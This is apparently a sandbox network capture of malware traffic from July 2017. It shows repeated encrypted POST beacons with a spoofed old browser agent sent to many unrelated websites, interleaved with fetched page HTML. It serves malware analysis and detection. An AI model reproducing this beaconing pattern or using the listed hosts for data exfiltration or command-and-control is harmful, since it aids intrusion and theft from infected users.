er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: frederickallergy.com
Connection: Keep-Alive
Cache-Control: no-cache

2btxRmHCI2Eu5aKWwHgrZjpV/n1fi919JVd4PVetqf8NyBi5NkxbBjQ 5Zo QX7qUGD9O3oraU0HiG3qwRcQjh52pCiGhshQjrXXROUBIsoFkXgGtDRKdPG1HCJ5eNoX3bP3yH4X2Te3EE8zTfi4OuYWkReXWiKuEqk FXTzeN8YrR0OSzNy2DyqvNWfZ/bI9NWnP dfi/M1AbgRjQLTdp1C2NPVqSzvBQPQ71TEek6ELrTBPy1gohCi8ZNlzpef KNhdbca5OuKbA8gnLy1KzLnM4GA5/WBiweyHv3RsFYAwULl/Nfhi5vRm5ci/QLfbrDtvoZBoppAqoBafgqPhPfSACuCJHTm26jyPxq1PmeF/F09goL0 d7VmlJMa3o36hq0aDOoIZZQWpve9RvEijuF8Q04RYm/O10OwIT070anhic/YRcsuDfkGxeMzy9Locr0CrH/UO8KgP8ZRTn8MVB8MEE34Q==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:21:23 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 07 Dec 2015 18:16:22 GMT
ETag: "400050-41ad-dab4a980"
Accept-Ranges: bytes
Content-Length: 16813
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<link href='http
://fonts.googleapis.com/css?family=Playfair Display SC:400,400italic,9
00' rel='stylesheet' type='text/css' />..<link href='hXXp://font
s.googleapis.com/css?family=Merriweather:400,400italic,900,300' rel='s
tylesheet' type='text/css' />...<script type="text/javascript" s
rc="js/cufon-yui.js"></script>.<script type="text/javascri
pt" src="js/ITC_Franklin_Gothic_Std_400-ITC_Franklin_Gothic_Std_600-IT
C_Franklin_Gothic_Std_italic_400-ITC_Franklin_Gothic_Std_italic_600.fo
nt.js"></script>.<script src="Scripts/swfobject_modified.j
s" type="text/javascript"></script>.<script type="text/jav
ascript">..Cufon.replace('h1');.</script>..<script type="t
ext/javascript">.. var _gaq = _gaq || [];. _gaq.push(['_setAccoun
t', 'UA-26234826-1']);. _gaq.push(['_trackPageview']);.. (function()
{. var ga = document.createElement('script'); ga.type = 'text/java
script'; ga.async = true;. ga.src = ('https:' == document.location.
protocol ? 'hXXps://ssl <hXXps://ssl/> ' : 'hXXp://www <http:
//www/> ') '.google-analytics.com/ga.js <hXXp://google-analyti
cs.com/ga.js> ';. var s = document.getElementsByTagName('script'
)[0]; s.parentNode.insertBefore(ga, s);. })();..</script>...<
;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kaufthal.com
Connection: Keep-Alive
Cache-Control: no-cache

t6bfnYg5GGwsEsgGyw/e/vsBuyUQq 0NPAXjuRdCSb4MIeC7d00FCiu0AS94jmCu2MUCu288fkrMqCJVEFs1F7FQaLz6hjFweVNAaQF4ygxRoLwq1Ubel1w5L1R5EZdCAnYeLkukwaVelOQk7Sflz5EDFYJ6y2F14XbE05WFaTqwsvsTQkCJmsomQl6kcP0OmrVIG8LkUa1XfgT Hemi1Fc9gPqgFfXrwsPsliQCRqbX0ha0Zpq/1ChawgQWlEN6ywUdmZNSnxhmpZvOnivpVvBT2bz13Qhwkl/mdb7w8ZQZhQPRz9C6hrwfuieo76nHIJYyFRij8peElLmvGuEoZE5Ytf310cNWIrnwIK2/kAHmhWzVOI70xSCYlndW5 MrhIdMNXHYMx707jAllWd8eAl9ZmWcAmAYTPdN5ECuwI/W37KyiiRnzyglp9jVgM1iNaHqRb2 EdgpoWbWsSJBVxYGgIE56w==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:54 GMT
Server: Apache/2.4.25 (cPanel) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Fri, 01 Mar 2002 23:13:14 GMT
ETag: "11617db-6437-39b28c8715680"
Accept-Ranges: bytes
Content-Length: 25655
Keep-Alive: timeout=30, max=100
Connection: Keep-Alive
Content-Type: text/html
<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">.<html
>..<head>...<title>Kaufthal.com by Jon Kaufthal</tit
le>...<meta name="description" content="Jon Kaufthal's homepage,
featuring links to Jewish/Israel, Sports, Entertainment & many other
resources--and much more! Come on down...">...<meta name="keywor
ds" content="Kaufthal, Jewish, Israel, Penn, Links, Sports, Economics,
Ramaz, Hakotel, PC Magazine, Fun, News, Politics, Reviews, Computers,
Internet, design, hotwired, wired, webmonkey, web site design, develo
per resource, developer, development, web development, design, code, g
eek, warez, free, new, latest, news, tools, info, tutorials, how-to, b
uilder, web builder, page builder, design, hotwired, wired, webmonkey,
web site design, developer resource, developer, development, web deve
lopment, design, code, geek, warez, free, new, latest, news, tools, in
fo, tutorials, how-to, builder, web builder, page builder">...<s
cript language="javascript">....<!--.....function clikker(a,b) {
......if (a.style.display =='') {.......a.style.display = 'none';.....
..//b.src='/library/images/gifs/homepage/usm.gif';......}......else {.
... ...a.style.display='';.......//b.src='/library/images/gifs/homepag
e/dsmh.gif';......}.....}..........//detect browser.....//var version
= parseInt(navigator.appVersion); .... .// Returns 4 for 4.x browsers
..... .//var isIE = navigator.appVersion.indexOf("MSIE")>0;.... .
//var isNav = navigator.appVersion.indexOf("Nav")>0;..... .// I

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.cksglobal.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d807ecd1c253c16f26ae7119b26c172571498907801; expires=Sun, 01-Jul-18 11:16:41 GMT; path=/; domain=.cksglobal.net; HttpOnly
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Last-Modified: Sat, 01 Jul 2017 11:12:25 GMT
Cache-Control: max-age=2592000
Expires: Mon, 31 Jul 2017 11:16:41 GMT
Server: cloudflare-nginx
CF-RAY: 3778f45d959f8442-KBP
f843.......<!DOCTYPE html>.<!--[if IE 9]><html class="n
o-js ie9" lang="en-US" prefix="og: hXXp://ogp.me/ns# fb: hXXp://ogp.me
/ns/fb#"><![endif]-->.<!--[if gt IE 9]><!--><h
tml class="no-js" lang="en-US" prefix="og: hXXp://ogp.me/ns# fb: http:
//ogp.me/ns/fb#"><!--<![endif]-->..<head>. .<met
a charset="UTF-8">.<meta name="viewport" content="width=device-w
idth, initial-scale=1.0">.<title>Buy Industrial Computers, Pa
nel PC, Projected Capacitive Touch Screen</title>.<script typ
e="text/javascript">.//<![CDATA[.var _gaq = _gaq || [];_gaq.push
(['_setAccount', 'UA-47004037-1']);_gaq.push(['_trackPageview']);(func
tion() {var ga = document.createElement('script'); ga.type = 'text/jav
ascript'; ga.async = true;ga.src = ('https:' == document.location.prot
ocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga.js';v
ar s = document.getElementsByTagName('script')[0]; s.parentNode.insert
Before(ga, s);})();(function(b){(function(a){"__CF"in b&&"DJS"in b.__C
F?b.__CF.DJS.push(a):"addEventListener"in b?b.addEventListener("load",
a,!1):b.attachEvent("onload",a)})(function(){"FB"in b&&"Event"in FB&&"
subscribe"in FB.Event&&(FB.Event.subscribe("edge.create",function(a){_
gaq.push(["_trackSocial","facebook","like",a])}),FB.Event.subscribe("e
dge.remove",function(a){_gaq.push(["_trackSocial","facebook","unlike",
a])}),FB.Event.subscribe("message.send",function(a){_gaq.push(["_track
Social","facebook","send",a])}));"twttr"in b&&"events"in twttr&&"b

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Host: itgsolutions.nl
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:52 GMT
Server: Apache
Location: hXXps://itgsolutions.nl/
Content-Length: 232
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXps://itgsolutions.nl/">here</a&
gt;.</p>.</body></html>.HTTP/1.1 301 Moved Permanent
ly..Date: Sat, 01 Jul 2017 11:16:52 GMT..Server: Apache..Location: htt
ps://itgsolutions.nl/..Content-Length: 232..Keep-Alive: timeout=5, max
=100..Connection: Keep-Alive..Content-Type: text/html; charset=iso-885
9-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
/head><body>.<h1>Moved Permanently</h1>.<p>
The document has moved <a href="hXXps://itgsolutions.nl/">here&l
t;/a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ompgp.co.jp
Connection: Keep-Alive
Cache-Control: no-cache

v5r2vg1BPnMonzIrhG/IPsbEoSB7PUjDkUITUiAyByKZoUm1fgTKegfK96FL/fXKqbnPbCUfllYMNBVRvIl3MqSmjSboqn1YKYMS8lGpDzDAMNmLI03827ziouSwMH0egXiXFMiol/wiRadLPxNV8DfNG2vSKVygU/UO0yKsHvKenouBsfEiBpPoMMqb/3DUnab4h2p0T2Wf0VGCsM9O6K9f0ohyXLguYdBIajP12Bpp7JTT1ExsH1Um5e/pigKwIg6WWQqxMOh2KyEiBU0BaRV0Z3qP6YzREeoueuRnDUJZKP3UUhUzgp8ULeo9kz3IznbydzYgLlY3QNurmfOn1Zl/n8P8oEmqu3/m6OV1PJ85ElA/UcrWTKvtezYDTITDuv3I3VC4prxWlnxDH4TmP/cNDlSIWbMWbFb/LyLipkwUb114MlX37NloIzBeSYd35QOityc7
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:17:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Vary: Host
Location: hXXp://VVV.ompgp.co.jp/
Vary: Accept-Encoding,User-Agent
HTTP/1.1 301 Moved Permanently..Server: nginx..Date: Sat, 01 Jul 2017 
11:17:03 GMT..Content-Type: text/html; charset=UTF-8..Content-Length:
0..Connection: keep-alive..Vary: Host..Location: hXXp://VVV.ompgp.co.j
p/..Vary: Accept-Encoding,User-Agent..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kvadratoff.ru
Connection: Keep-Alive
Cache-Control: no-cache

7BNpg59ZGXKg32Wq/tr04Sh1CZp1PmV3QytaHnSVr9I0rjk89Cb3CX/5I88mrfaMHJOXIs1M JtHsXwePGgbfSL8sz6ouzPLhQlogcil3Xvyfj9Yur7MD1TmYXYs0DsMXRpEWibdiHthG2Mcps5DN5o6JD/p0bUKdKBMtfjUZM536Sqo6Pb8wwPSwNFRro y2S4qyixeFUhTyE3ud29GrQEuW7xPLwehGNPDuhVGWOKFltcbZ6t ZjOycLIsFdBzRgdS nXePfwNGKTokpbx/Xszap3y0emrg/qKmdfnNv99CU9Klls97rIutFnW6Owc7wr0mqhdlk0Ja2oanHnbq9w8aC8PpCqEy7duhhV9NneHH1cHaxlNp uLPrccvnsYaqQ/1KbJPakzik DM/9aevfcJkHOXXrSNPwmUEt2UJuy62HFRYS/vY/WcwiY4tk6/7JgFQihh6a9AQeVdGF9IVQYv4aiOnQUiFmTKBVaSA==
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10606
Connection: keep-alive
X-Powered-By: PHP/5.4.45
X-Pingback: hXXp://kvadratoff.ru/xmlrpc.php
Link: <hXXp://kvadratoff.ru/>; rel=shortlink
<!DOCTYPE html>..<html lang="ru-RU">..<head>..<me
ta charset="UTF-8">..<meta name="viewport" content="width=device
-width, initial-scale=1">..<meta name="keywords" content="kvadra
t, kvadratoff, .............., .............., ......................,
............, .........., ........................">..<meta nam
e="description" content=".............. ................ .............
..... .. 2009 ........ .................... .............. ...........
......... ........................ .................... .. ...........
.-......................... .... ........ ............ ...... ........
...... ........................ ........ .... .................... ...
................... .... ........................ ....................
............ ................... .......................... ..........
........ ........................ ........................ ...........
... ................ .......... .................., .. ...............
......... .......... ................ .......... ............ ........
...... .......">..<link rel="profile" href="hXXp://gmpg.org/xfn
/11">..<link rel="pingback" href="hXXp://kvadratoff.ru/xmlrpc.ph
p">..<link rel="icon" href="hXXp://kvadratoff.ru/wp-content/them
es/kvadrat/favicon.png">..<link rel="apple-touch-icon" href="htt
p://kvadratoff.ru/wp-content/themes/kvadrat/apple-touch-icon.png">.
.<title>.... ".............." | .............. .......
......... .................. .. 2009 ........ ....................

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 432
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: genmar.gen.tr
Connection: Keep-Alive
Cache-Control: no-cache

tLByLZ8ronHQIfC0/oST4Sgb1GZ1 DtsQyVXkmTEzDeL/VYcdu9IbH T Nw0NAep9p3S//37HEv71MOeiDneJVXiBxyi2Zfq6Fnrn0t0RkoNT8UM7vZSv479rJXLY9oP1R81vIoRDCPgfM5x1wyQUkurr3zSd8RKPIjR1Ql48SBSZ4r5jvhoYbFkSO386D E9E4gJOjHrIOKeHqVncgt11f2D9qcoQl7dQw74gAaOUsEz7qIm/C59HbkPJ sqOqTEIYGX02k9qRSL4y7Yi1bQVkS9reVZTVgkuaLxpTgfh8Nkp vlsAz0kL/0Si8I4355l9hgl5X3ojy7ARAkWjmfsyTZSB9oD7pWLMnNCqk3f3kCRu/QCBrOKm1EXE5G/dvjeCj0HFUIm84BoKL7WX3utuRrmQ8T5fj1SlF UOg5Cx qA==
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=dec2cd68baee90387d3b90d9ad5a9c8c21498907821; expires=Sun, 01-Jul-18 11:17:01 GMT; path=/; domain=.genmar.gen.tr; HttpOnly
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f4da36a2844e-KBP
11b1..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: geodecisions.com
Connection: Keep-Alive
Cache-Control: no-cache

SZg246bw7F/HE9R7QU PA8mshk G63EBOs/JYfiTBnJAer6LP84fuQaDx0SWWt22OLOzKdHrPxZur9ljrGxljLaij4bQEZZLwUMf67PJtcT6jpWh46AtcthmmY77utwy61ou0cjxobdn28JTQf/JaN2IcwEus D/i50ZNwtLp9MgBshL8nTIHJClzZgeXNqoZEreSot10v3aYfqyQe/CB2qtYzDyzvs7s30matTb0cOenkJiO jPztRqTX595X5jZw3sBY6nWhHsxgk 5e9TVHRNqWj5yXdse2TBMzMrxHO/sh cHjdC/X//JH3aE4ZS1c4okwbAus/hoIrOsyCxv/S2RW6H6xi/cbQS1tEdpqVyUDOO4N0M/mBvrfQzQ w4dUXiBlzm1YRxHJRlMtV1qckXVWXTvN72CS6gSw32nv5a8UbBa7uA593XdleRNPHpkVxtc1dzTtUXbJkGRlBTZ/11RGY9KTk nPgwuAHhW/kXDM727/AlmHmaar7L VGH
HTTP/1.1 403 Forbidden
content-length: 375
x-synthetic: true
expires: Thu, 01 Jan 1970 00:00:00 UTC
pragma: no-cache
cache-control: no-cache, must-revalidate
content-type: text/html; charset=UTF-8
connection: close
date: Sat, 01 Jul 2017 11:16:40 UTC
x-contextid: ih7iyCza/A0hqC3oo
x-via: 1.1 echo108
<html>.<head>.<title>403 Forbidden</title>.<
;style> body { background-color: #F2F2F2; color: #3E3E3E; font-fami
ly: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 12px; }
pre { word-wrap: break-word; } </style>.</head>.<body&
gt;.<h1>403 Forbidden</h1>.<p><pre>ih7iyCza/A0
hqC3oo @ Sat, 01 Jul 2017 11:16:40 GMT</pre>.<p><pre>
;BRICK-6</pre>.<p><pre></pre>.</body>.&l
t;/html>..


GET /tj.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: tj.symcb.com


HTTP/1.1 200 OK
Server: Apache
ETag: "51ee3eb661308e2d20e0436ed06679f0:1434417110"
Last-Modified: Tue, 16 Jun 2015 01:11:50 GMT
Content-Type: text/plain
Date: Sat, 01 Jul 2017 11:16:44 GMT
Content-Length: 1206
Connection: keep-alive
0...0..............m.0..#=...e.0...*.H........0..1.0...U....US1.0...U.
...thawte, Inc.1(0&..U....Certification Services Division1806..U.../(c
) 2006 thawte, Inc. - For authorized use only1.0...U....thawte Primary
Root CA0...131031000000Z..231030235959Z0A1.0...U....US1.0...U....thaw
te, Inc.1.0...U....thawte SSL CA - G20.."0...*.H.............0........
........Y ;D..R9...z...@.F..(...`8?...B...I....l.7o.. <m.t...$.A...
6.....S...........<.2V..N....9P.ne.....Y.H......>;. ...F.`d.u...
8.G{4.....v...&.y.6H..7..2.|.S....T8/Ou..Z.....[........tU......Fdr8.Z
.:...q..T...l..>..?!.;.~.GS...FC.K-..../..~....l...o...........;0..
70...U.......0.......0...U...........02..U... 0)0'.%.#.!hXXp://t1.symc
b.com/ThawtePCA.crl0/.. ........#0!0... .....0...hXXp://t2.symcb.com0A
..U. .:0806..`.H...E..60(0&.. .........hXXps://VVV.thawte.com/cps0)..U
..."0 ..0.1.0...U....SymantecPKI-1-5370...U.......OHW..O..]8}......R`0
...U.#..0...{[E....z.1..j..F.WHP0...*.H................C.v...#.^.c.}D.
.k..........k....,.7......p.(B..Kwj...#.VM..i......[>.<.:..l'...
.`q'.....D.H...v!....d..6?..<>...X..r.h... .R..w.qp.U5.7..M..p..
@nK}..)*.y..Lga...'.Y..U...35-^N..........t.,..M../...r|.1n.....6Q{.a.
m.#[4....1.........'2...i. .......`..&.xHTTP/1.1 200 OK..Server: Apach
e..ETag: "51ee3eb661308e2d20e0436ed06679f0:1434417110"..Last-Modified:
Tue, 16 Jun 2015 01:11:50 GMT..Content-Type: text/plain..Date: Sat, 0
1 Jul 2017 11:16:44 GMT..Content-Length: 1206..Connection: keep-alive.
.0...0..............m.0..#=...e.0...*.H........0..1.0...U....US1.0

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 472
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: cath4choice.org
Connection: Keep-Alive
Cache-Control: no-cache

BIRPsFGh/WAO3xFt8Gp/ KrBcAUPbdKMFW16j85Pmq6fM178XaTYDJ79ujgzMLigCmOxypIvgPqDu eYSFhXXue i8Z8gTQZTMtSkfAyPapM3DAd8vVVHopOWmZG8CpbMKDaQrZVHARL1EYQBSVN93ejCrOnVqAMmUCV0B38 irVZn3zbjiqIcIOORimT QRuu41cX/HurZ/fUHQdP/MnWjew5PtkzDkwcwiwGW4583MJaKH3lztOxvH3Yx Kgodr0st bxBN0plLVym1wgYzY7G1NLapmlBrhmqH4VBiNjFkar/nLrDgVnywVoRTSFO6jP 6jyBdBrz GhjwEW71ZN02r7WHUIveoXNONWy5h7nF3XrCcqOIcweBk2IxBvBdHvOSC1DIvmkR3jUneBdyIB4Rodlo4QpjN7eJ25DWC0qsEHTgXDBCAaxL7LeNY9T1cjdOYfDDWRy7IKP4TIl9A==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 35586
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCRRSCRB=LFHJJAMDPDOFEGAKPIBIGGCE; path=/
Cache-control: private
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html
xmlns="hXXp://VVV.w3.org/1999/xhtml"><!-- InstanceBegin template
="/Templates/home.dwt" codeOutsideHTMLIsLocked="false" -->..<hea
d>..<meta http-equiv="Content-Type" content="text/html; charset=
UTF-8" />..<!-- InstanceBeginEditable name="doctitle" -->..&l
t;title>Catholics for Choice</title>..<meta name="keywords
" content="Catholic, Choice, Abortion, Bishops, Jon O'Brien" />..&l
t;link rel="alternate" type="application/rss xml" title="RSS" href="fe
ed.xml" />..<meta name="google-site-verification" content="LjaKv
6l886pMNunQjq4CA0nI47O89zkMvfKbeq3I_dY" />..<!-- InstanceEndEdit
able -->..<!-- CSS -->..<link href="/includes/css/screen.c
ss" rel="stylesheet" type="text/css" media="screen" />..<link hr
ef="/includes/css/user.css" rel="stylesheet" type="text/css" media="sc
reen" />..<link href="/includes/css/nav.css" rel="stylesheet" ty
pe="text/css" media="screen" />..<link href="/includes/css/print
.css" rel="stylesheet" type="text/css" media="print" />..<link h
ref="/includes/css/sIFR-screen.css" rel="stylesheet" type="text/css" m
edia="screen" />..<link href="/includes/css/sIFR-print.css" rel=
"stylesheet" type="text/css" media="print" />..<link href="/incl
udes/css/sIFR-styles.css" rel="stylesheet" type="text/css" media="scre
en" />..<link href="/includes/css/lightbox-style.css" rel="s

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 464
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: teasing-video.com
Connection: Keep-Alive
Cache-Control: no-cache

0glSTyWwTnVjmTHvzKM5v56/p9pzhgexKd/5q0Ezh0RgT3xdId08s7QyCs7t/IsYgzx1op6yQSLtVrRij7zKNlPxYRNmk3qlwumDSIoOzX9GWUtbzIPbGs6uprY76krOiLRgD60ujWcZ U/XHQ5qM43R5cJO1llg DDF5bxXliPCfoUv8FxyuMN1 daeYblu8qFHdpyEnZv/ EllIbc5cKYjD6CeaEsEobK7xkzTwpgEzsCCop2Z07SsoxiYZ3gcgtYP7GhMohAmXMShY37JlL/9az0fBMptxv1aw3B/1ByvVsAas19iq6Kc4XWbxgCyanWQ20MCwLnIlZMtoMdImsppik29g3gppkDa 92UywPunbavBu567reEIwbX2AKHNa2DwEcXJeYQa0usHXioMYrjAdxStKs2oKXh1OmXm3rx7EvEP6p0WT4OqlDNC9BEzXwQMYK4/ke7TA==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:05 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df6ea91bc511599a75c4968385e623ec51498907825; expires=Sun, 01-Jul-18 11:17:05 GMT; path=/; domain=.teasing-video.com; HttpOnly
Server: cloudflare-nginx
CF-RAY: 3778f4f5101d824f-KBP
6..Denied..0..HTTP/1.1 403 Forbidden..Date: Sat, 01 Jul 2017 11:17:05 
GMT..Content-Type: text/html; charset=iso-8859-1..Transfer-Encoding: c
hunked..Connection: keep-alive..Set-Cookie: __cfduid=df6ea91bc511599a7
5c4968385e623ec51498907825; expires=Sun, 01-Jul-18 11:17:05 GMT; path=
/; domain=.teasing-video.com; HttpOnly..Server: cloudflare-nginx..CF-R
AY: 3778f4f5101d824f-KBP..6..Denied..0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: myfilecenter.com
Connection: Keep-Alive
Cache-Control: no-cache

uhXFP6C06HPrMOSS89/XetPk2E8IMOxA1KVkTJmdvqzpa7kSq2l6OaDc1rAEa/1PV57n/gDn167nITkFQnMwBKVPaNAdJ6FGho7E2RhH0cLlVX/5gpC9HeRAp3iiIlUfhsVhC6D0x5tpAVtz 2MXHhEsdabzECtgD8aE8W49IXvqzG0P5KAK19 lWsGA FYeaxQadD6TKrSbNMzxjLIyPUYAlwXJzPobNIQnsD6htNej5R2f3IzNLIddwXTH/GLy5Uju/rf50lTMWEh7PJnVTkVQnrUrrq9WMU2D3SdJv0E6K50SUVmYB/v89deN8JRmYGkIFCuRZPNYaU3/sCx iDscgDfhay3 4gRgyvbvuSrvR8xIW24rZe6jz7YzTY0Bub/nKdB/1wJsTshtkixLxBb5LasGZuPJ73phTOMzd3UsP3O/plIaDqDzZnZSOjO0i75hJIvMdvABWmvn7E08SKhjkkdQ7XVeKYm2Gv29Dq7E
HTTP/1.1 307 Temporary Redirect
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.shbrazil.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 01 Jul 2017 11:16:40 GMT
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Powered-By: ASP.NET
Content-Length: 23111
Connection: keep-alive
<!DOCTYPE html>..<html class="blue template-2 ">..<head
>...<meta charset="utf-8">...<meta http-equiv="X-UA-Compat
ible" content="IE=edge">...<title>Lojas S&H</title>
...<meta name="viewport" content="width=device-width, initial-scale
=1">.. <meta name="description" content="Loja variada de elet
rônicos, informática, calçados, vestuário e muito
mais.">..<link href="/Content/Styles/template-2/template-2.css"
rel="stylesheet"/>...<link href="/Content/Styles/normalize.css"
rel="stylesheet"/>.....<script src="/Scripts/3rd/jquery-2.1.1.js
"></script>...<script src="/Scripts/3rd/jquery.mask.js">
;</script>...<script src="/Scripts/3rd/underscore.js"><
/script>...<script src="/Scripts/Util/UI.js"></script>.
..<script src="/Scripts/Util/Text.js"></script>...<scri
pt src="/Scripts/main.js"></script>.....<script src="/Scri
pts/3rd/handlebars-v2.0.0.js"></script>...<script src="/Sc
ripts/3rd/jquery.simpleGallery.js"></script>...<script src
="/Scripts/3rd/jquery.simpleLens.js"></script>...<script s
rc="/Scripts/3rd/jquery.jcarousel.js"></script>.....<scrip
t src="/Scripts/3rd/jquery.validate.js"></script>...<scrip
t src="/Scripts/3rd/jquery.validate.extension.js"></script>..
.<script src="/Scripts/Validator.js"></script>...<scrip
t src="/Scripts/3rd/jquery.touchSwipe.js"></script>.....&

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: cgc-england.com
Connection: Keep-Alive
Cache-Control: no-cache

